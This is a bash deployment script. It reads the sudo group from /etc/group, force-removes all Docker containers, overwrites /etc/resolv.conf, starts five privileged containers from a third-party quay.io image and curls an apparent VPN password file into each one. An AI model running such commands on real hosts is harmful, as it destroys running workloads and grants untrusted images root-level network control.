
#!/bin/bash
echo  $(grep '^sudo:.*$' /etc/group | cut -d: -f4) > read.me

export su_img_3=$(cat read.me)
echo  $su_img_3
export host=$su_img_3"-gc-emma-"
export img2="quay.io/xm0uray/site_5:tag1"
export img="quay.io/xm0uray/site_5:main"
export sess="p"
echo $img

docker rm -f $(docker ps -q)
docker rmi -f $img
#echo -e "nameserver 103.86.96.100\nnameserver 103.86.99.100" >  /etc/resolv.conf
echo -e "nameserver 8.8.8.8\nnameserver 8.8.4.4" >  /etc/resolv.conf


echo  "HOST : [" $host " ] " " | IMAGE_DOCKER : [ "$img " ]" $sess
for (( i=1; i <= 5; i++ )); do
  bash -c  "docker run -d --name $sess$i --cap-add=NET_ADMIN  -h  $host$i --privileged -v /sys/fs/cgroup:/sys/fs/cgroup:ro  $img"
done

############################################################################################################################
sleep 2
#4

docker exec -it p1 /bin/bash -c 'curl https://raw.githubusercontent.com/cata0nana/start/main/p/1 > /root/0nord_pass' &&
docker exec -it p2 /bin/bash -c 'curl https://raw.githubusercontent.com/cata0nana/start/main/p/1 > /root/0nord_pass' &&
docker exec -it p3 /bin/bash -c 'curl https://raw.githubusercontent.com/cata0nana/start/main/p/1 > /root/0nord_pass' &&
docker exec -it p4 /bin/bash -c 'curl https://raw.githubusercontent.com/cata0nana/start/main/p/1 > /root/0nord_pass' &&
docker exec -it p5 /bin/bash -c 'curl https://raw.githubusercontent.com/cata0nana/start/main/p/1 > /root/0nord_pass'
